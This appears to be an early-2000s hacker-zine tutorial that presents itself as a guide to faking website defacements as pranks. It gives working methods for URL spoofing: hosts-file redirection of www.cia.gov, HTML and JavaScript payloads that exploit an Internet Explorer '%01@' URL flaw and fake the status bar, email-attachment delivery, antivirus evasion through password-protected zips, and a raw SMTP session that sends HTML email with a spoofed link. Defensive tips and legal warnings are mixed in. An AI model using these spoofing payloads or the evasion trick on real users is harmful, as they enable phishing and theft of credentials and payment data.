Beginners' Series Number 10
How to *LEGALLY* Deface Web Sites (Honest! Would I lie to you?)
____________________________________________________________
OK, OK, just kidding. This Guide is really about how to fool your
friends into thinking you have defaced a web site. You can do this by
tricking the computer of your victim, er, friend into showing a false
web address. It's so easy, even a beginner can pull off these tricks.
In this Guide you will learn:
* How to alter a computer to which you have access so that anyone who
uses it will be tricked, muhahaha!
* How to set up a button on your web page that tricks someone who uses
Internet Explorer into thinking you defaced the CIA web site.
* How to send an email attachment that tricks someone who uses
Internet Explorer into thinking you defaced the CIA web site.
* Plus, an uberhacker bonus, how to forge email so you can insert
weird hidden codes into it.
Even if you don't like to play practical jokes, it's still worthwhile
to understand how easy it can be to trick someone into thinking they
are viewing a different web site from the actual one. What if you are
buying something online? To whom are you *really* giving your credit
card information? To whom are you *really* giving your online banking
information?
__________________________________________________
* How to alter a computer to which you have access so that anyone who
uses it will be tricked, muhahaha!
__________________________________________________
The easiest way to trick someone into thinking you have defaced a web
site is if you have access to his or her computer (or can get them to
use yours) and can edit the hosts file. Whether the victim computer is
a Mac, Windows, Linux or almost any other operating system, it should
have a file named "hosts". In Windows XP and 2000 it is in
C:/windows/system32/drivers/etc/. In Linux it is in /etc.
If you open the hosts file in an editing program such as Notepad, it
will look something like this:
# © (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host
name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
Now add on to it:
206.61.52.30 www.cia.gov
Get online, type http://www.cia.gov into the location window of your
browser, and you will get the Happyhacker.org web page, while the
location bar says http://www.cia.gov!
OK, so you want to pick a really rank web page to display instead of
our friendly Happyhacker page. How do you find the number that you put
in front of www.cia.gov?
If you have Windows XP, 2000, 2003, Mac OSX, Linux or any kind of
Unix, the answer is easy. If you have a Mac or Linux, bring up a
terminal or shell window. In Windows, click , click Start --> All
Programs --> Accessories --> Command prompt. (Or search for a file
named command.com or cmd.exe and run it.) Then type:
ping rottendisgustingsite.com
Pinging rottendisgustingsite.com [216.999.248.174] with 32 bytes of
data:
That gives the numerical address you need, in this case
216.999.248.174.
______________________________________________________________________
Newbie note: What do those numbers mean? They are Internet addresses,
usually called "IP addresses." They are kind of like phone numbers
used to reach computers over the Internet. When you enter a domain
name (happyhacker.org is an example of a domain name) into the window
of your browser, your computer has to look up the number to which it
corresponds in order to contact it, kind of like looking in a phone
book. In the cases above I messed up the IP addresses by putting 999's
so that lots of people wouldn't attack those IP addresses. Real IP
addresses only contain numbers between the periods of up to 254.
______________________________________________________________________
What if you want to create your own "hacked" web site at one of those
free web hosting places? How do you redirect a computer to your exact
page? Let's say it's at http://www.freewebsites.com/~mysite/. Tell
your friend that you hid a hacked page at http://www.cia.gov/~mysite/.
Then direct the IP address for freewebsites.com to www.cia.gov. When
she or he types in http://www.cia.com/~mysite/ she will see your own
web page.
There is one case in which this hack won't work: if the computer on
which you play this trick uses a proxy server. This is common in large
organizations as a security measure. So be sure to test your hack
before showing it off!
__________________________________________________
*** How to set up a button or link on your web page that tricks someone who uses Internet Explorer into thinking you defaced a web site.
__________________________________________________
What if you can't alter the hosts file of your friend's computer? As of today, an easy way to spoof URLs is to exploit a flaw in Internet Explorer versions up to 6.0. You can test for this flaw at http://happyhacker.org/defend/test.shtml . Note: some antivirus programs will claim that this test is a virus. That is not true. They merely are reacting to the fact that it is an attempt to spoof a URL, and are not well enough programmed to tell you it is a URL spoof instead of a virus. If your browser is vulnerable, a link on that page will take you to what looks like http://www.nsa.gov. If your browser is OK, it will show you that this page is actually http://www.happyhacker.org/defend/fakems.htm . The Opera browser will warn you about spoofed URLs (see http://www.opera.com). TSome browsers will partially show a faked URL, usually as http://www.nsa.gov%01@happyhacker.org/defend/fakems.htm.
Now the trick is to somehow get your friend to click on a button you have created to get him or her to go to your "hacked" web site. How does this work? The code for the funny button on this web page is:
<button
onclick="location.href=unescape('http://www.nsa.gov%01@happyhacker.org'/defend/fakems.htm');"
style="font: 8pt verdana, sans-serif;">
<B>Test Exploit</B> </button>
If you have a web site, here is code you can upload that will make a web page that carries your boast about defacing a web site:
<HTML>
<HEAD>
<TITLE>Trick web page</TITLE>
</HEAD>
<BODY>
<BODY BGCOLOR="#ffffff">
<button
onclick="location.href=unescape('http://www.cia.gov%01@happyhacker.org');"
style="font: 12 pt Comic Sans MS">
<B>Click here for proof that I hacked the CIA web page!!!!</B>
</button>
</BODY>
</HTML>
Anyone who has a vulnerable browser will click on it and get the Happy Hacker web site, but the location bar in the browser will say http://www.cia.gov. Of course you could connect to a page on your own web site where you can plaster the childish, ungrammatical, misspelled boasts of the typical web site defacer. For examples of defaced web sites that you can use as, ahem, style guides, see http://www.zone-h.org.
Unless you can include the character between gov and % that probably shows up in your browser as a box, this is not a perfect hack. Without that funny character, if your friend looks at the bottom of the browser, he or she can see a briefly displayed message, "Opening page http://www.cia.gov%01@happyhacker.org…" However, if your friend is on a broadband connection, this message will flash by too fast to read. Aw, shucks.
__________________________________________________
Evil genius tip: How do you embed that funny character on your web page? Hint: find an editor that works with Unicode, and doesn't try to do a whole bunch of extra stuff (like MS Word does). __________________________________________________
GaNt points out that there is another way to make a phoney link. Actually several other ways. "By using the href="#" the link is now activated to point to itself. The onClick will be able to activate because the link will not leave the page.
It would be a really good idea to change the status bar as well, so I put that code into it, too."
This is the Link Text
Here is what the code is for the link above:
<a href="#" onClick="location.href=unescape('http://www.nsa.gov%01@happyhacker.org/defend/fakems.htm');" onMouseOver="window.status='http://www.nsa.gov';return true;" onMouseOut="window.status='';return false;">This is the Link Text </a>
Another way to spoof a URL on a web page is to use Javascript. If you've never written a program before, don't sweat. It is super easy to write programs, especially when you have sample code. Try this for a web page:
<script>
function fakIt(spoofed, real){
document.location.href=unescape(spoofed + '%01@' + real);
}
</script>
</head>
<a href="javascript:fakIt('http://www.nsa.gov','happyhacker.org/defend/fakems.htm')" onMouseOver="window.status='This link is the best way to fake a hack of the NSA web site';return true;" onMouseOut="window.status='';return false;">Click here for my defacement of the NSA web site</a>
<br>
<a onClick="location.href=unescape('http://www.nsa.gov%01@happyhacker.org/defend/fakems.htm');" onMouseOver="this.style.cursor = 'hand';"><u><font color="blue"> This is a link that shows nothing when the mouse runs over it</font></u></a>
</BODY><BR>
</HTML></P>
Here's how this will work on your web page:
Click here for my defacement of the NSA web site
This is a link that shows nothing when the mouse runs over it
This Javascript program was based on one written by GaNt. You can enjoy more of his work at his web site, http//www.BleachEatingFreaks.com.
First thing to notice is that when you run a mouse over the upper link, it only shows whatever text you have programmed into the "onMouseOver" command. If you really want to fake someone out, put the URL of the web site you claim to have hacked there. That part of the program is easy to customize. You could have the mouseover stuff read "Muhahaha" -- get the idea? Of course you can also easily modify the URL, for example inserting some really disgusting site.
If your friend knows something about computer security, this won't work because he or she might be using a relatively safe browser such as Mozilla (free from http://www.mozilla.org). You can defend against the Javascript attack by disabling it on your browser.
You can make your browsers much safer by disabling not only Javascript but all active scripting. To turn off active scripting (Javascript, ActiveX and Java) in IE 6:
Click Tools --> Internet Options and choose the Advanced tab. Scroll down the list of radio buttons to Microsoft VM and uncheck all of them.
Next choose the Security tab. At the very top you will see the ActiveX controls and plug-ins. Click the "prompt" radio buttons for all of them. This will give you a chance to see whether an ActiveX program is the culprit.
Continue scrolling down the radio buttons to Java permissions. Unclick the Java radio button.
To turn off active scripting in Mozilla:
Click edit --> Preferences--> Advanced and unclick the Java radio button.
Then click Scripts & Plugins and disable Javascript. __________________________________________________
* How to send an email attachment that tricks someone who uses Internet Explorer into thinking you defaced the CIA web site.
__________________________________________________
If you don't have a web site of your own, here's another way to fake a URL. Send this web page code via an attachment to email. Here's how to do it. In Windows, click Start --> All Programs --> Accessories --> Notepad. Cut and paste the code into Notepad, then save it as hack.htm. Then attach this file to an email with a charming invitation to view your dastardly defacement of the CIA web page. When the reader clicks on the attachment, it will bring up the default browser, usually IE. By clicking on the button that the browser shows, it will display http://www.cia.gov in the location window, but it will really be at Happyhacker.org (or whatever awful web site you picked).
Is it possible to put the button hack into the body text of an email? Yes, but it doesn't seem to work there. I've tested this exploit against both Eudora 6.0.1 and Outlook Express 6.0. When I coded the exploit into the message body, it displayed the button, but clicking on it doesn't do anything. However, keep tuned, there might be a way to do this. If you would like to test new exploits, see the Uberhacker bonus section below for help on how to embed interesting code into email.
GaNt points out that his Javascript above can be inserted into an email by making a web site and then cutting and pasting it into Outlook. I found that sometimes this trick doesn't seem to work right away, but there is another trick. If your code just looks like code in your email that you are sending, email it to yourself. Oftentimes it will be working properly when you receive it. Then use the redirect or forward command to send it on to someone else. __________________________________________________
You can get punched in the nose warning: Many antivirus programs will block email with spoofed URLs. Whomever you send it to might accuse you of trying to infect him or her with a virus, because these antivirus programs call *everything* a virus! To evade antivirus programs, try sending an attachment that is zipped and passworded. Without the password the antivirus program can't scan for a spoofed URL.
__________________________________________________
__________________________________________________
*** Uberhacker bonus!
__________________________________________________
You may have noticed I didn't give exact instructions for how to send emails with working code to spoof URLs. That's because spoofed URLs in email are too easy to use to commit crime.
Also, you may wonder why we are offering so many different ways to spoof URLs. The reason is that over time the browser and antivirus companies will come up with ways to defeat one spoofing scheme after another. It is up to white hat hackers to keep on finding and publicizing new spoofing schemes in order to force those responsible to fix these vulnerabilities. If we don't do this, criminal hackers will secretly use URL spoofing to do tremendous harm.
I'm willing to provide at least some help for those who are serious about doing legal hacking experiments. If you have email clients you would like to test against URL spoofing exploits of this Guide, or if you want to experiment with other weird coding schemes in email, here's one way to embed the test code of your choice.
*** First, you need to be using an online server that provides you with an SMTP or ESMPT-protocol compatible email server. Hotmail and AOL won't work.
*** Second, you might need to use your real email address. As a protection against spammers, some email servers won't accept emails with false sender addresses.
*** Third, as a protection against spammers, some email servers will disconnect you if you mistype something. And although backspacing to erase seems to work with most telnet clients, it doesn't really work. So if you mistype something, it's better to disconnect and start over.
Here's an example of how to embed funny code in your email. Bring up a DOS or terminal window and type:
telnet mail.foobar.com 25
(Substitute the name of your online service provider for foobar.com.)
Following is a copy of an actual email forging session. The lines with numbers in front of them are what the mail server sent, and the lines without numbers are the commands you would give:
220 foobar.com VopMail ESMTP Receiver Version 5.1.202.0 Ready
helo cmeinel@fubar.com
250 OK
mail from:cmeinel@foobar.com
250 cmeinel@abq.com OK
rcpt to:cmeinel@techbroker.com
250 cmeinel@techbroker.com OK
data
354 Ready for data
Subject: Muhahaha! I hacked the CIA web site!!!!
Content-Type: text/html;
<HEAD>
<TITLE>Trick web page</TITLE>
</HEAD>
<BODY>
<BODY BGCOLOR="#ffffff">
<a href="http://www.cia.gov @happyhacker.org/" style="font: 8pt verdana, sans-serif;">
Click here to see the hacked CIA website!
</a>
</BODY>
</HTML>
.
250 Message received OK
QUIT
221 foobar.com closing
Don't forget that lone period at the end of the text. You have to hit enter, then type a period, then hit enter again to send your email.
__________________________________________________
Evil genius tip: There is a trick to getting this email to work. There is an funny character in the URL that probably looks like a box on your browser. Thanks to this funny character, even the bar at the bottom of IE will display only "www.cia.gov" when loading this spoofed URL in IE. Criminals could use this to trick thousands of people into giving them their bank account and credit card information.
__________________________________________________
You can go to jail warning: It is legal to discover and publicize ways to encode a button that tricks people into going to a phony web site. It is a crime, however, if someone uses this to steal from people or violate their privacy.
__________________________________________________
So far Microsoft hasn't seen fit to fix this vulnerability in IE. So there is a good chance the soon some criminal will take advantage of this to steal lots of money and passwords. But since you have read this, you will be able to avoid becoming a victim by using a safe browser such as Mozilla.
__________________________________________________
A shoutout to Alex, who pointed out that the Opera browser is immune to the URL spoofing of this Guide, and to astronut, who pointed out my "duh" moment -- use the URL of the site you are spoofing with the "onMouseOver" command. Another shout out goes to Robert Wilson, han_solo@juno.com, who helped me perfect the trick with the " " character. And I (Carolyn Meinel) hope to heck you readers appreciated this Guide, because thanks to that funny character I had to code this Guide by hand on a Unicode-friendly editor instead of using a web page editor. Groan.
Further reading:
The Secunia.com advisory on URL spoofing:
http://www.secunia.com/advisories/10395/
Steps that you can take to help identify and to help protect yourself from deceptive (spoofed) Web sites and malicious hyperlinks:
http://support.microsoft.com/?id=833786 (Note: it doesn't tell you how to avoid being tricked by the email code shown above.)
The Semantic Hacking Project http://www.ists.dartmouth.edu/IRIA/projects/d_semantic.htm
___________________________________________________________
Where are those back issues of GTMHHs? Check out the official Happy Hacker Web page at http://www.happyhacker.org.
We are against computer crime. We support good, old-fashioned hacking of the kind that led to the creation of the Internet and a new era of freedom of information. But we hate computer crime. So don't email us about any crimes you may have committed or may want to commit!
